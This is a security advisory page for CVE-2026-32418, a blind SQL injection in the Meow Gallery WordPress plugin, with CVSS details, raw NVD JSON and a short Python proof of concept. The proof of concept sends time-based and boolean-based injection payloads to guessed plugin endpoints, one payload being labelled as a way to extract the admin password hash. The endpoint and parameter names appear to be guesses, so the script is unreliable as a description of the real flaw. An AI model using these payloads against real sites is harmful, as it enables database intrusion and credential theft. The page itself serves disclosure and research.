Security Vulnerability Report
中文
CVE-2026-32418 CVSS 7.6 HIGH

CVE-2026-32418

Published: 2026-03-13 19:54:59
Last Modified: 2026-04-22 21:30:26
Source: [email protected]

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Jordy Meow Meow Gallery meow-gallery allows Blind SQL Injection.This issue affects Meow Gallery: from n/a through <= 5.4.4.

CVSS Details

CVSS Score
7.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Meow Gallery <= 5.4.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import time # CVE-2026-32418 PoC - Blind SQL Injection in Meow Gallery # Target: WordPress site with Meow Gallery plugin <= 5.4.4 target_url = "http://target-wordpress-site.com" # Blind SQL Injection payload examples: # Time-based blind SQL injection payload_time = "1' AND (SELECT * FROM (SELECT(SLEEP(5)))a) AND '1'='1" # Boolean-based blind SQL injection to extract admin password hash payload_bool = "1' AND (SELECT CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)='1" def test_sqli(url, payload): """Test for SQL injection vulnerability""" # Common Meow Gallery endpoint patterns endpoints = [ "/wp-admin/admin-ajax.php", "/wp-json/meow-gallery/v1/gallery", ] for endpoint in endpoints: full_url = url + endpoint data = { 'action': 'meow_gallery_query', 'gallery_id': payload, } try: start_time = time.time() response = requests.post(full_url, data=data, timeout=10) elapsed = time.time() - start_time if elapsed >= 5: print(f"[+] Vulnerable endpoint found: {endpoint}") print(f"[+] Time-based blind SQLi confirmed (delay: {elapsed}s)") return True except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False if __name__ == "__main__": print("[*] Testing CVE-2026-32418 - Meow Gallery SQL Injection") test_sqli(target_url, payload_time) print("[*] Scan complete")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32418", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:59.307", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Jordy Meow Meow Gallery meow-gallery allows Blind SQL Injection.This issue affects Meow Gallery: from n/a through <= 5.4.4."}, {"lang": "es", "value": "Neutralización Incorrecta de Elementos Especiales utilizados en un Comando SQL ('Inyección SQL') vulnerabilidad en Jordy Meow Meow Gallery meow-gallery permite Inyección SQL Ciega. Este problema afecta a Meow Gallery: desde n/d hasta &lt;= 5.4.4."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:L", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/meow-gallery/vulnerability/wordpress-meow-gallery-plugin-5-4-4-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.